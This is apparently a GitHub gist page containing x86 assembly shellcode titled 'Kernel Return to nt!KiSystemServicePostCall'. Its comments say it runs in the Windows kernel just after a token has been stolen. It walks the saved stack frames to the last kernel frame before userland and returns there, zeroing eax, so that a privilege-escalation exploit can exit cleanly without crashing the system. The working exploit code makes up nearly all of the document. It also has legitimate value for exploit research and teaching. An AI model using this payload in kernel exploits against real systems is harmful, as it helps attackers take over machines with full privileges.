-
-
Save wmliang/8e3dceba15db0e94a106817ca9ccd285 to your computer and use it in GitHub Desktop.
x86 Kernel Return to nt!KiSystemServicePostCall
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [BITS 32] | |
| ; This shellcode is meant to be executed in the kernel just after the token has | |
| ; been stolen. It walks up the stack looking for the first frame which returns | |
| ; to userland and returns into the one just before it. This is presumably | |
| ; nt!KiSystemServicePostCall which will clean up the operation before returning | |
| ; to userland. | |
| ; This shell code clobbers ecx, ebx and sets eax to 0 for the return value. | |
| global _start | |
| _start: | |
| xor ecx, ecx ; set the frame counter to 0 | |
| mov ebx, ebp ; use ebx to avoid modifying ebp | |
| count_frames: ; count the frames until the condition is met | |
| inc ecx ; increment the counter | |
| test dword [ebx+4], 0x80000000 ; check that the return address is in userland | |
| mov ebx, [ebx] ; move to the next frame | |
| jne short count_frames | |
| dec ecx ; decrement the counter to return to the last kernel address | |
| loop_frames: ; move up the frames | |
| dec ecx ; decrement the counter | |
| mov esp, ebp ; move the base pointer to the stack pointer | |
| pop ebp ; get the preserved base pointer | |
| cmp ecx, 0 ; check the counter before continuing | |
| jne short loop_frames | |
| xor eax, eax ; set the return value | |
| ret ; return into the target frame |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment